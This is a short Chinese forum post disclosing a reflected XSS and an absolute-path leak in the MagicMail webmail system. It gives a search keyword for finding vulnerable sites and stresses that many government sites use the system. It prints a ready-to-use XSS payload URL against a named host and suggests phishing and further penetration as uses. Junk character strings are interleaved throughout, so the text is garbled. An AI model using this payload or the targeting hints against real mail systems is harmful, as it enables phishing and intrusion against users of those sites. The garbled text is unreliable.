今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
8 ^ ]% G5 B$ c, o) T, S' F7 v) p
1 G9 r* B6 x! I: _; g+ [ ; a5 @/ _: D% j
包含 一个反射性XSS 以及 绝对路径泄漏6 o" ?! s5 q/ `# q' C5 Y
看了看 貌似全部是linux的。
l- {# y+ s" F; s1 x
# I7 h$ H# ~+ @" D5 |, |关键字:迈捷邮件系统 by MagicMail
0 @1 s1 O8 k2 c, o% F
0 P! Q5 e& j. x2 E可以看到很多政府网站都用这个邮件系统 W6 F0 p9 f5 z" Q/ g
) F E" v! X/ b
绝对路径 http://madman.in/index.php?login_type=declare&language=4 ^( B9 N( Z1 A5 f/ m
$ {* G' H: |8 V- G! N" k
+ P/ P0 i! y0 q7 v2 f! L
3 d: |0 B& V% E' Y @' J( b' j4 _XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
" d% w J5 F; T! b, ?2 C' w8 q
, {% O2 ` [4 }4 q! b( A# D- m9 ]$ `
! a+ C3 P$ H. B) ?" a虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等! A/ L( W4 k! P/ S* v) m% n
) q* D9 O5 \. c" N修复方案:看官方补丁吧。* G2 D' c3 h' S3 s
|